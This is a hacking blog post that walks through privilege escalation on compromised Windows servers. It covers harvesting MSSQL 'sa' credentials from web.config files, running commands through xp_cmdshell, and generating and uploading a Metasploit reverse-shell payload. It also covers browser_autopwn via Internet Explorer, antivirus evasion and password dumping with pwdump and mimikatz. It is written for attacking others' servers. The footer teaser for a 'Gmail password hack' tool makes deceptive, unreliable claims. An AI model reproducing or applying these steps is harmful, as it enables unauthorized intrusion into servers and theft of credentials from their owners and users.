How to Hack Windows Servers Using Privilege Escalation

How to Hack Windows Servers Using Privilege Escalation ?

A lot of the People are here that can hack websites,systems,mobiles and servers. But the thing which create problem is an  error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.So let start with me i will  explain how to do.


Privilege Escalation Hacking

Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.
 

Using “sa” account to execute commands by MSSQL query via ‘xp_cmdshell’ stored procedure.
Using meterpreter payload to get a reverse shell over the target machine.
Using browser_autopwn. (Really…)
Using other tools like pwdump7, mimikatz, etc. 

Using these tools is very  easy way, but the fun of hacking lies in the first three methods I written above.

1. Using xp_cmdshell- 

A lot of the times on windows servers, we have read permission over the files of other IIS users, which is important to make this method work correctly.

If our luck works enough, we will find login credentials of “sa” account of MSSQL server inside web.config file of any website.

You must be thinking  why just “sa”?

Here, “sa” stands for Super Administrator and as the name suggests, this user has all possible permissions over the server because it is Supper Administrator.

Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.

So, after getting the “sa” account, we can login remotely using HeidiSQL

HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.

After logging into MSSQL server with sa account, we get a list of databases and their contents.

Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)

Syntax for the query is-

xp_cmdshell ‘[command]’

For example, if I need to know my current privileges, I would query-

xp_cmdshell ‘whoami’



This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.

Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.

2. Meterpreter Payload-

This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.

Using metasploit, generate a reverse shell payload binary.

For example-

msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor.

Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)

Now it’s time to execute the payload.

If everything goes right, we will get a meterpreter session over the target machine as shown below-

We can also use php, asp or other payloads.

3. Browser Autopwn-

This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.

Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.

I think it is clear by now that what I’m trying to explain ;)

We can start Internet Explorer from command line and make it browse to a specific URL.

Syntax for  this-

iexplore.exe [URL]

Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.


4. Using readily available tools-


Tools like pwdump and mimikatz can crack passwords of windows users.

#pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper.

#mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it.

You can google about them and learn how to use these tools and what actually they exploit to get the job done for you.

I hope you can now exploit every another windows server.
 

 

Comments

Post a Comment

Popular posts from this blog

From Start to finish: Cracking a Windows Server 2012 R2 Administrator account

want you to imagine your best friend from college challenges you to a duel. Here’s the deal: you both graduated with honors from ivy league schools but your careers bifurcated down different paths.  You decided to work in corporate america but he started his own software company in Silicon Valley. Now you’re friend has a kinetic personality.  He’s incredibly smart, talks faster than you can think and really understand technology.  But he’s also full of hubris and lacks humility. One day over drinks, in a moment of spontaneity, he looks you straight in the eye and challenges you to a duel. He leans in and boasts: With a smug smirk on his face, he stretches out his hand for the shake. Would you shake on it? You decided to shake on it.  After all, it’s not going to cost you anything to accept the challenge. The first thing you need to do is figure out how you’re going to gain access to his corporation.  Are you planning to penetrate h...
Read more

How do I hack a Gmail account

Image
**Warning : Deep Web Content ahead.** You can hack your Gmail account password using the tool given below : Gmail Password Hack Online Tool This tool is completely free to use and works on all iOS/android smartphones and tablets as well pc. It can hack the password of any Gmail user if you have their correct email id or Google+ username. To hack any Gmail password in less than 5 minutes, just follow the easy steps below : Go to Hack Gmail Account Online tool (Hack Gmail Account Online) from any mobile/pc bowser. Enter victim’s email id or G+ username in the field and click Next. Wait for the server to hack the Gmail password of the victim. It can take 2–3 minutes so do not close the window. In the last step, you can download the hacked password instantly. The server will automatically log you into victim’s Gmail account. This tool can used to recover your own gmail password when you have forgotten the security question or recovery email. It works with 100% accu...
Read more

MIT App Inventor — How To Develop Awesome Android Apps Without Coding

Image
MIT App Inventor is a groundbreaking tool for developing Android applications without any prior programming and coding skills. Using this open source tool, one can convert his/her creative ideas into Android applications. As this utility is browser and cloud-based, you don’t need to download any software or store anything on your computer. A pp development is one of the most in-demand technical skills. However, making a polished and responsive app that’s free from bugs isn’t always simple. To develop a native mobile app , one also needs to have a clear idea of multiple aspects like the market for that app, available resources, and skills needed to write that app.Android app development isn’t any different from this opinion. However, if you’ve got your creative energy flowing and you have a bright idea in mind, all you need to do is grab a proper tool, start learning, and implement your ideas. But, what if you come from a non-coding background? Worry ...
Read more